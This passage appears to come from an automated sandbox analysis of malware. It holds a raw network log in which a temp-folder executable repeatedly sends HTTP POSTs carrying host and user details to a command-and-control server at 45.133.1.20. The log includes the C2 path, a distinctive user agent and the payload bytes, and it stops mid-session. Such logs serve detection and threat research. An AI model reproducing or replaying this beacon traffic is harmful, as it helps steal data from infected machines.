May 5, 2022 08:47:10.511112928 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.511158943 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.536814928 CEST	80	49847	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.501878977 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.527569056 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.527698040 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.530445099 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.556118965 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.556226015 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.581864119 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.612447977 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.612610102 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:11.612704039 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.614583015 CEST	49855	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:11.640259981 CEST	80	49855	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.660037041 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.685731888 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.685843945 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.688633919 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.714425087 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.714560032 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.740238905 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.771070957 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.771102905 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:13.771171093 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.771204948 CEST	49868	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:13.796912909 CEST	80	49868	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.025366068 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.050980091 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.051112890 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.057698011 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.083270073 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.083367109 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.108820915 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.142337084 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.142362118 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:17.142452002 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.142510891 CEST	49879	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:17.168212891 CEST	80	49879	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.257633924 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.283416986 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.283579111 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.286217928 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.311800957 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.311959982 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.337587118 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.361577988 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.363302946 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.444921017 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.446794033 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.758858919 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:24.758987904 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.759005070 CEST	49886	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:24.784897089 CEST	80	49886	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.511306047 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.537061930 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.537213087 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.539921045 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.565530062 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.565720081 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.591340065 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.615139008 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.615156889 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:28.615305901 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.615361929 CEST	49887	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:28.641108036 CEST	80	49887	45.133.1.20	192.168.2.6
May 5, 2022 08:47:30.995107889 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.020828962 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:31.020981073 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.023957968 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.050052881 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:31.050134897 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.075862885 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:31.104381084 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:31.104415894 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:31.104532957 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.104590893 CEST	49888	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:31.130075932 CEST	80	49888	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.234580040 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.260128975 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.260339022 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.263125896 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.288858891 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.289024115 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.314564943 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.340547085 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.340564966 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:32.340675116 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.340719938 CEST	49889	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:32.367496014 CEST	80	49889	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.417562008 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.443418026 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.443561077 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.446894884 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.472717047 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.472860098 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.498712063 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.523540020 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.523596048 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:33.523776054 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.523827076 CEST	49891	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:33.550730944 CEST	80	49891	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.634751081 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.660824060 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.661043882 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.664293051 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.690912008 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.691047907 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.718034029 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.749701977 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.749730110 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:34.749830008 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.749871016 CEST	49892	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:34.776948929 CEST	80	49892	45.133.1.20	192.168.2.6
May 5, 2022 08:47:35.911021948 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:35.937227964 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:35.937793016 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:35.940589905 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:35.967703104 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:35.967854023 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:35.996565104 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:36.032215118 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:36.032263994 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:36.032386065 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:36.032428026 CEST	49893	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:36.058248043 CEST	80	49893	45.133.1.20	192.168.2.6
May 5, 2022 08:47:37.200330019 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.202897072 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.230452061 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:40.230549097 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.233323097 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.259469986 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:40.259624958 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.285490036 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:40.311688900 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:40.311707973 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:40.311781883 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.311819077 CEST	49895	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:40.337304115 CEST	80	49895	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.419795990 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.445677996 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.445765972 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.448687077 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.474549055 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.474642992 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.500396013 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.533077955 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.533104897 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:43.533193111 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.533240080 CEST	49904	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:43.558902979 CEST	80	49904	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.480550051 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.506306887 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.506443977 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.510409117 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.536051035 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.536200047 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.561769962 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.586188078 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.586237907 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:44.586371899 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.586421967 CEST	49910	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:44.611979008 CEST	80	49910	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.557718992 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.583482981 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.583703995 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.587445021 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.613042116 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.613163948 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.638751984 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.670989037 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.671133995 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.671281099 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:45.671358109 CEST	49916	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:45.696782112 CEST	80	49916	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.694916010 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.720531940 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.720663071 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.723903894 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.749489069 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.750441074 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.776109934 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.807706118 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.807825089 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:46.807851076 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.809027910 CEST	49921	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:46.833426952 CEST	80	49921	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.087534904 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.113632917 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.114027977 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.122828960 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.148468971 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.148577929 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.174340010 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.208786011 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.208836079 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:49.208903074 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.208980083 CEST	49922	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:49.234626055 CEST	80	49922	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.702646971 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.728332996 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.728435040 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.765647888 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.793119907 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.793185949 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.819107056 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.848263025 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.848318100 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:51.848431110 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.853259087 CEST	49923	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:51.879383087 CEST	80	49923	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.573014021 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.598664999 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.598783016 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.606168985 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.638566971 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.638679028 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.676873922 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.703870058 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.703892946 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:53.704015017 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.704513073 CEST	49925	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:53.731298923 CEST	80	49925	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.226053953 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.251678944 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.251986027 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.260222912 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.285716057 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.286011934 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.311479092 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.342236996 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.342252016 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:55.342389107 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.342475891 CEST	49926	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:55.368029118 CEST	80	49926	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.144908905 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.170449018 CEST	80	49927	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.170639992 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.175396919 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.201045036 CEST	80	49927	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.201181889 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.226572037 CEST	80	49927	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.259251118 CEST	80	49927	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.259380102 CEST	80	49927	45.133.1.20	192.168.2.6
May 5, 2022 08:47:56.259455919 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.259505033 CEST	49927	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:56.284890890 CEST	80	49927	45.133.1.20	192.168.2.6

HTTP Request Dependency Graph

45.133.1.20

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49771	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:01.499744892 CEST	1062	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 196 Connection: close
May 5, 2022 08:46:01.525635004 CEST	1062	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer701188DESKTOP-716T771k08F9C4E9C79A3B52B3F739430FSzQb
May 5, 2022 08:46:01.580796957 CEST	1062	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:01 GMT Server: Apache Status: 404 Not Found Content-Length: 15 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49772	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:03.132381916 CEST	1063	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 196 Connection: close
May 5, 2022 08:46:03.158319950 CEST	1063	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer701188DESKTOP-716T771+08F9C4E9C79A3B52B3F739430PDCzU
May 5, 2022 08:46:03.221048117 CEST	1064	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:03 GMT Server: Apache Status: 404 Not Found Content-Length: 15 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49782	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:17.488993883 CEST	1164	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:17.517147064 CEST	1165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:17.568052053 CEST	1165	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:17 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49783	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:18.841994047 CEST	1166	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:18.867662907 CEST	1166	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:18.919632912 CEST	1166	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:18 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49786	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:21.088184118 CEST	1210	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:21.115345001 CEST	1211	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:21.180464983 CEST	1211	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:21 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49789	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:23.904851913 CEST	1234	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:23.930970907 CEST	1234	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:23.986737013 CEST	1235	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:23 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49790	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
